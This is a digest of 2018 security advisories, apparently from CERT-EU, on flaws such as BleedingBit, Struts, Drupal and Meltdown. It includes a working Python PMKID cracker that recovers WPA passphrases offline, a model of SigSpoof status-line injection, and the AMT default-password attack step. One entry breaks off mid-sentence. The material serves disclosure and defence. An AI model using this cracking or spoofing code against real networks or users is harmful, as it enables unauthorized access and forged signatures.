2018-028: BLEEDINGBIT - Vulnerabilities Affecting Enterprise WiFi Devices (Monday, November 5, 2018 4:43:00 PM CET)
Security researchers disclosed details of two critical vulnerabilities in BLE (Bluetooth Low Energy) chips made by Texas Instruments (TI). The vulnerable BLE chips are embedded in WiFi access points from Cisco, Meraki and Aruba Networks. Dubbed BleedingBit, the two vulnerabilities could allow an unauthenticated attacker within Bluetooth range of the device to execute arbitrary code and take full control of it; no prior access to the network is needed.
2018-027: Multiple Vulnerabilities in Oracle Products (Friday, October 19, 2018 3:37:00 PM CEST)
On 16th of October 2018, Oracle released its quarterly Critical Patch Update, which addresses several security vulnerabilities and contains 301 new security fixes. The affected products include, among others, Oracle Database, Oracle Communications, Enterprise Manager, Fusion Middleware, Java, MySQL, Retail Applications and PeopleSoft.
2018-026: Vulnerabilities in PHP (Tuesday, October 16, 2018 2:09:00 PM CEST)
On 11th of October 2018, several vulnerabilities were fixed in PHP, a programming language designed for web applications. According to the Center for Internet Security, these vulnerabilities could allow an adversary to execute arbitrary code and/or cause a denial of service (DoS).
2018-025: Cisco Webex Player Remote Code Execution Vulnerabilities (Friday, September 21, 2018 10:46:00 AM CEST)
On 19th of September 2018, Cisco published a security advisory concerning remote code execution vulnerabilities in the Cisco Webex Player. These vulnerabilities allow an unauthenticated, remote attacker to execute arbitrary code on an affected system. They are due to improper validation of Webex recording files. An attacker could exploit them by sending a user an e-mail with a link to, or an attachment containing, a malicious recording file and persuading the user to open it in the Cisco Webex Player. Cisco has released software updates that address these vulnerabilities.
2018-024: Windows Task Scheduler – Privilege Escalation Vulnerability (Thursday, August 30, 2018 10:51:00 AM CEST)
On August 27th, a researcher using the handle SandboxEscaper announced on Twitter an unpatched local privilege escalation vulnerability in Windows. The flaw lies in the way the Task Scheduler service uses its Advanced Local Procedure Call (ALPC) interface to read and set permissions: it allows a user with only read access to an object to change the rights on that object. Ultimately, this lets a local user run code with SYSTEM privileges. A proof of concept has already been published on the Internet and there is no patch available yet.
2018-023: Major Vulnerability in Ghostscript (Friday, August 24, 2018 3:46:00 PM CEST)
Ghostscript -- an interpreter for PostScript and PDF -- is affected by a major vulnerability that allows a crafted document to escape the -dSAFER sandbox and execute commands. There is currently no patch available, but some workarounds are possible, such as disabling the PS, EPS and PDF coders in ImageMagick's policy.xml on systems that process untrusted images.
2018-022: Apache Struts -- Critical Remote Code Execution Vulnerability (Thursday, August 23, 2018 4:57:00 PM CEST)
Semmle researchers discovered and disclosed a critical remote code execution vulnerability (CVE-2018-11776) in the Apache Struts web application framework. The flaw could allow remote attackers to run malicious code on affected servers through a crafted URL when certain configurations are used (no namespace set for an action result, or wildcard namespaces). Upgrading to Struts 2.3.35 or 2.5.17 fixes the issue.
2018-020: Speculative Execution Attack on Intel Processors (Friday, August 17, 2018 10:04:00 AM CEST)
In January 2018, two separate teams discovered flaws in Intel processors allowing speculative execution attacks and notified Intel of their findings. On 14th of August 2018, the vulnerabilities were disclosed publicly under the name Foreshadow (called L1 Terminal Fault, L1TF, by Intel). Based on the technical details provided, Intel investigated further and identified two other attack channels with the potential to impact additional microprocessors, operating systems, System Management Mode and virtualization software.
2018-021: Critical Vulnerabilities in Adobe Acrobat and Reader (Thursday, August 16, 2018 4:35:00 PM CEST)
On 14th of August 2018, Adobe released a security bulletin addressing two critical vulnerabilities affecting Adobe Acrobat and Reader for Windows and macOS. Successful exploitation could lead to arbitrary code execution in the context of the current user, for example through a malicious PDF delivered in a phishing campaign. No exploitation has been observed in the wild yet.
2018-019: New attack on WPA/WPA2 using PMKID (Wednesday, August 8, 2018 8:53:00 AM CEST)
On August 4th, the researcher Jens Steube (author of hashcat) published on the hashcat forums a new method to obtain a hash derived from the Pre-Shared Key (PSK) of a WiFi access point. The PMKID is sent by the access point in the first message of the 4-way handshake, so the attacker only needs to attempt an association with the access point; no connected client and no captured full handshake are required. The hash can then be attacked offline, and a successful attack recovers the PSK.
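The derivation behind this attack, as an added example that is not part of the CERT-EU advisory and not hashcat's code: the PMK comes from PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, and the PMKID is the first 128 bits of HMAC-SHA1 over "PMK Name", the access point MAC and the station MAC. Everything except the PMK is public, so a captured PMKID is enough for an offline dictionary attack. The network, MAC addresses and passphrase below are constructed for the example; the capture line layout follows the `PMKID*MAC_AP*MAC_STA*ESSID_hex` format used by hashcat mode 16800.

```python
"""PMKID derivation and offline PSK recovery (added example; not the advisory's
or hashcat's code). All sample values are constructed."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal PMK: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """RSN PMKID: first 16 bytes of HMAC-SHA1(PMK, "PMK Name" || AA || SPA)."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def to_hashcat_16800(captured: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """Serialize a capture as 'PMKID*MAC_AP*MAC_STA*ESSID_hex' (hashcat mode 16800 layout)."""
    return "*".join([captured.hex(), ap_mac.hex(), sta_mac.hex(),
                     ssid.encode("utf-8").hex()])


def from_hashcat_16800(line: str):
    """Parse the same layout back into (pmkid, ap_mac, sta_mac, ssid)."""
    p, ap, sta, essid = line.strip().split("*")
    return (bytes.fromhex(p), bytes.fromhex(ap), bytes.fromhex(sta),
            bytes.fromhex(essid).decode("utf-8"))


def recover_psk(line: str, wordlist):
    """Offline dictionary attack: first passphrase whose PMKID matches, else None.

    No frames are needed beyond the one carrying the PMKID: every guess is
    checked purely locally with the public SSID and MAC addresses.
    """
    captured, ap_mac, sta_mac, ssid = from_hashcat_16800(line)
    for candidate in wordlist:
        guess = pmkid(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(guess, captured):
            return candidate
    return None


# Constructed sample network (not a real capture).
SAMPLE_SSID = "corp-guest"
SAMPLE_PSK = "Autumn-Leaves-2018"
SAMPLE_AP_MAC = bytes.fromhex("001122aabbcc")
SAMPLE_STA_MAC = bytes.fromhex("66778899ddee")


def sample_capture_line() -> str:
    """What a capture tool would hand to the cracker for the sample network."""
    captured = pmkid(pmk_from_passphrase(SAMPLE_PSK, SAMPLE_SSID),
                     SAMPLE_AP_MAC, SAMPLE_STA_MAC)
    return to_hashcat_16800(captured, SAMPLE_AP_MAC, SAMPLE_STA_MAC, SAMPLE_SSID)


if __name__ == "__main__":
    line = sample_capture_line()
    print("capture line:", line)
    print("recovered PSK:", recover_psk(line, ["password", "letmein", SAMPLE_PSK, "12345678"]))
```

The 4096-round PBKDF2 is the only expensive step, and it is per guess, not per capture, which is why the practical defence is a long, non-dictionary passphrase (or WPA3/802.1X) rather than any configuration of the access point.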
2018-018: WebLogic Vulnerability Exploited In The Wild (Thursday, July 26, 2018 5:00:00 PM CEST)
In its July 2018 Critical Patch Update, Oracle released patches for vulnerability CVE-2018-2893, a deserialization flaw reachable over the WebLogic T3 protocol that allows an unauthenticated attacker to compromise Oracle WebLogic Server. Exploits were published on GitHub and other websites after the announcement of the security updates, and attacks against vulnerable instances have been reported. Where patching is not immediately possible, T3 access should be restricted with a WebLogic connection filter.
2018-017: Juniper JunOS Multiple Vulnerabilities (Friday, July 13, 2018 4:49:00 PM CEST)
On the 12th of July 2018, Juniper released updates to address several vulnerabilities affecting Junos OS. A remote attacker could exploit them to trigger privilege escalation, denial of service, firewall rule bypass, security restriction bypass and sensitive information disclosure on the targeted system. An exploit is available for the privilege escalation vulnerability (CVE-2018-0024).
2018-016: Signature Spoofing Vulnerability in GnuPG (Friday, June 15, 2018 2:27:00 PM CEST)
On 13th of June 2018, Marcus Brinkmann released technical details of a vulnerability impacting GnuPG and most applications built on top of it (Enigmail, GPGTools, python-gnupg, etc.). It can be exploited by a remote attacker to spoof signatures in encrypted messages. Security researchers named the vulnerabilities SigSpoof.
Exploitation requires the verbose option to be enabled (via the configuration file or a command-line parameter): in verbose mode GnuPG logs the attacker-controlled file name embedded in the message, and a name containing line breaks can inject fake status lines into the output stream that applications parse for verification results. A successful exploitation allows the attacker to spoof signature verification and message decryption results. In the case of Enigmail, the message does not even need to be encrypted (encryption is spoofed as well).
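A model of the data flow that makes this spoofing possible, as an added example that is not part of the advisory and is neither GnuPG's nor Enigmail's code. It does no OpenPGP parsing: the "message" is reduced to the attacker-chosen file name of the literal data packet, which verbose mode echoes as `gpg: original file name='...'`. Status lines normally arrive on a dedicated status fd as `[GNUPG:] KEYWORD ...`; a frontend that points the status fd at stderr reads both through one descriptor, and a line-oriented parser then accepts the injected `GOODSIG`. The status keywords are real GnuPG ones, the sample name and the `escape_control` sanitizer (an illustration of the kind of fix shipped in GnuPG 2.2.8, not its actual code) are constructed for the example.

```python
"""Status-line injection of the SigSpoof kind (added example; not GnuPG's or
Enigmail's code). Models the output streams, not OpenPGP itself."""

# Attacker-controlled file name stored in the literal data packet (constructed).
# The trailing "gpg: " makes the leftover closing quote look like a harmless log line.
SPOOFED_NAME = (
    "invoice.txt\n"
    "[GNUPG:] GOODSIG F2AD85AC1E42B367 Finance Team <finance@example.invalid>\n"
    "gpg: "
)

# Genuine status GnuPG would emit for an encrypted but UNSIGNED message (constructed).
REAL_STATUS = [
    "[GNUPG:] DECRYPTION_OKAY",
    "[GNUPG:] END_DECRYPTION",
]

STATUS_PREFIX = "[GNUPG:] "


def escape_control(name: str) -> str:
    """Illustrative sanitizer: no raw line breaks may reach the log line."""
    return name.replace("\\", "\\\\").replace("\n", "\\n").replace("\r", "\\r")


def run_gpg(file_name: str, verbose: bool, status_fd_is_stderr: bool, fixed: bool):
    """Return (status_text, stderr_text) as the frontend would read them.

    status_fd_is_stderr=True merges the status lines into stderr, the
    configuration (--status-fd 2) that makes the injection reachable.
    """
    log_lines = []
    if verbose:
        shown = escape_control(file_name) if fixed else file_name
        log_lines.append(f"gpg: original file name='{shown}'")
    status = "".join(line + "\n" for line in REAL_STATUS)
    stderr = "".join(line + "\n" for line in log_lines)
    if status_fd_is_stderr:
        return "", stderr + status
    return status, stderr


def parse_status(text: str):
    """Line-oriented status parser as found in many frontends: one keyword per status line."""
    keywords = []
    for line in text.splitlines():
        if line.startswith(STATUS_PREFIX):
            keywords.append(line[len(STATUS_PREFIX):].split(" ", 1)[0])
    return keywords


def frontend_thinks_signed(status_text: str, stderr_text: str, reads_status_from_stderr: bool) -> bool:
    """A naive frontend: trusts any GOODSIG keyword found in the stream it parses."""
    source = stderr_text if reads_status_from_stderr else status_text
    return "GOODSIG" in parse_status(source)


def scenario(verbose: bool, merged: bool, fixed: bool) -> bool:
    """True means the frontend reports a valid signature for an unsigned message."""
    status, err = run_gpg(SPOOFED_NAME, verbose, merged, fixed)
    return frontend_thinks_signed(status, err, merged)


if __name__ == "__main__":
    print("verbose + status on stderr:        ", scenario(True, True, False))   # spoofed
    print("verbose + dedicated status fd:     ", scenario(True, False, False))  # safe
    print("no verbose + status on stderr:     ", scenario(False, True, False))  # safe
    print("verbose + status on stderr + fixed:", scenario(True, True, True))    # safe
```

The four scenarios show why the advisory singles out verbose mode: the injection needs both the unsanitized log line and a frontend that reads status output from the same descriptor as the log. Either removing verbose, giving the status fd its own descriptor, or escaping the file name closes it.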
2018-015: Critical Vulnerabilities in Adobe Acrobat, Reader and Photoshop CC (Tuesday, May 15, 2018 5:26:00 PM CEST)
Adobe has released Security Bulletins APSB18-09 and APSB18-17 providing security updates for Adobe Acrobat, Reader and Photoshop CC for Windows and macOS. These updates address critical and important vulnerabilities whose successful exploitation could lead to arbitrary code execution in the context of the current user.
2018-014: Vulnerabilities in OpenPGP and S/MIME Client Implementations (Monday, May 14, 2018 5:01:00 PM CEST)
On 14th of May 2018, security researchers released technical details concerning vulnerabilities impacting OpenPGP and S/MIME encryption technologies. These vulnerabilities abuse e-mail clients that render HTML content when displaying e-mails to exfiltrate the plaintext of OpenPGP or S/MIME encrypted e-mail. Security researchers named those
2018-013: Cisco WebEx ARF Remote Code Execution Vulnerabilities (Thursday, May 3, 2018 12:58:00 PM CEST)
On May 2nd, 2018, Cisco published two advisories for remote code execution vulnerabilities, CVE-2018-0287 (medium) and CVE-2018-0264 (critical), in the various Cisco WebEx players. The players are used to play back WebEx meeting recordings made by an online meeting attendee; recordings use the Advanced Recording Format (ARF). An attacker could exploit these vulnerabilities by sending a link or an e-mail attachment with a malicious ARF file and persuading the target to open it. Successful exploitation could allow the attacker to execute arbitrary code on the target system.
2018-012: Drupal Core - Remote Code Execution (Friday, April 27, 2018 5:24:00 PM CEST)
Drupal is a content management system often used for enterprise content management projects. A remote code execution vulnerability (CVE-2018-7602) exists within multiple subsystems of Drupal 7.x and 8.x. It allows attackers to exploit multiple attack vectors on a Drupal site, resulting in the site being compromised. This vulnerability is related to Drupal core - highly critical - Remote Code Execution - SA-CORE-2018-002 (CVE-2018-7600). Both SA-CORE-2018-002/CERT-EU-SA2018-008 (CVE-2018-7600) and this vulnerability are being exploited in the wild.
2018-011: Cisco Products Multiple Vulnerabilities (Thursday, April 19, 2018 4:36:00 PM CEST)
On the 17th and 18th of April 2018, Cisco released several updates to address vulnerabilities affecting multiple products. A remote attacker could exploit these vulnerabilities to trigger cross-site scripting, denial of service, remote code execution, security restriction bypass and sensitive information disclosure on the targeted system.
2018-010: Critical Vulnerability in Sophos Mobile and Sophos Mobile Control (Tuesday, April 10, 2018 7:46:00 AM CEST)
On 26th of March 2018, Sophos released a security advisory concerning Sophos Mobile and Sophos Mobile Control. This critical vulnerability could allow an unauthenticated user to access the administration console or the self-service portal of Sophos Mobile.
2018-009: UPDATE Cisco Smart Install Protocol Remote Code Execution Vulnerability (Friday, April 6, 2018 5:10:00 PM CEST)
On 28th of March 2018, Cisco published a security advisory concerning a buffer overflow discovered in the Smart Install feature of Cisco IOS and Cisco IOS XE Software. This vulnerability allows an unauthenticated, remote attacker to execute arbitrary code on an affected device. Smart Install listens on TCP port 4786 and is enabled by default on many switches; where the feature is not needed it should be disabled with the "no vstack" configuration command, and port 4786 should not be reachable from untrusted networks.
A proof of concept for the vulnerability has been published and many attacks have already been observed in the wild.
2018-008: Drupal Core – Remote Code Execution (Friday, March 30, 2018 4:54:00 PM CEST)
The Drupal team announced a security advisory for a vulnerability (CVE-2018-7600) reported by Jasper Mattsson and rated Highly Critical with a score of 21/25 on the NIST Common Misuse Scoring System. A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site. Successful exploitation could lead to a compromise of the web application and possibly of the underlying operating system as well.
2018-007: Unauthorized Personal Data Sharing (Friday, March 30, 2018 4:49:00 PM CEST)
CERT-EU has recently observed the use of software tools and components that might lead to unauthorized leakage of personal data. These components are often available as browser extensions or plugins, or as e-mail client plugins. Examples include Zoominfo, Data.com, InsideView, NetProspex, DiscoverOrg and LeadIQ. Depending on the machine configuration and policy, these components can often be installed by the users themselves -- without any need for administrator access. Once installed, they typically gather contact information (address books, etc.), which is then exfiltrated and shared with third parties. Such indiscriminate sharing of corporate address books and similar data creates potential issues under the EU General Data Protection Regulation (GDPR), and hence should be avoided.
2018-006: Remote Code Execution Vulnerability in Exim (Wednesday, March 7, 2018 3:07:00 PM CET)
On February 5, 2018, DEVCORE Security Consulting discovered a buffer overflow vulnerability (CVE-2018-6789) in the base64 decode function of the Exim message transfer agent. On March 6, 2018, Exim released a security advisory about the issue, confirming that remote code execution could be triggered by sending a handcrafted message. The issue has been fixed in Exim 4.90.1 and no alternative mitigation is known.
2018-005: UPDATE Critical Vulnerability in Adobe Flash Player (Tuesday, February 6, 2018 4:50:00 PM CET)
On January 31, 2018, KrCERT/CC released a security alert regarding a vulnerability in Adobe Flash Player. Adobe Systems also released a security advisory about the vulnerability (CVE-2018-4878). According to Adobe, the vulnerability is being exploited in the wild. As of February 6th, 2018, a patch from Adobe is available.
2018-004: UPDATE Critical Vulnerability in Cisco Adaptive Security Appliance (Wednesday, January 31, 2018 12:35:00 PM CET)
On the 29th of January 2018, Cisco published a security advisory for a remote code execution and denial of service vulnerability (CVE-2018-0101) affecting Cisco Adaptive Security Appliance (ASA). The vulnerability is located in the Secure Sockets Layer (SSL) VPN functionality of the Cisco ASA Software and could allow an unauthenticated, remote attacker to cause a reboot of the affected system or to remotely execute code. On the 5th of February 2018, Cisco updated the advisory after identifying additional attack vectors and released new patches.
2018-003: Critical Vulnerability in Electron on Windows (Monday, January 29, 2018 3:57:00 PM CET)
On the 22nd of January 2018, GitHub published a fix for a remote code execution vulnerability (CVE-2018-1000006) affecting Electron applications on Windows that register themselves as the default handler for a custom protocol. An attacker could exploit the vulnerability by getting the victim to open a specially crafted link that invokes the custom protocol handler. The vulnerability affects - among others - applications such as Skype and Slack.
2018-002: INTEL AMT Security Issue (Friday, January 12, 2018 4:33:00 PM CET)
On January 12th 2018, F-Secure reported a security issue affecting laptops supporting Intel's Active Management Technology (AMT). An attacker with brief physical access can boot into the Intel Management Engine BIOS Extension (MEBx) menu, log in with the default password "admin" if it was never changed, and enable remote access for later exploitation, bypassing the need to enter credentials such as the BIOS and BitLocker passwords and TPM PINs. Setting a strong MEBx password, or disabling AMT when it is not used, prevents the attack.
2018-001: UPDATE Meltdown and Spectre Critical Vulnerabilities (Thursday, January 11, 2018 10:39:00 AM CET)
Design flaws in modern computer processors allow programs to steal data being processed on the computer. The hardware design deficiencies led to the development of two attack scenarios: Meltdown, which breaks the security boundaries normally enforced by the processor hardware between user applications and the operating system, and Spectre, which abuses speculative execution and branch prediction to leak information across process and sandbox boundaries.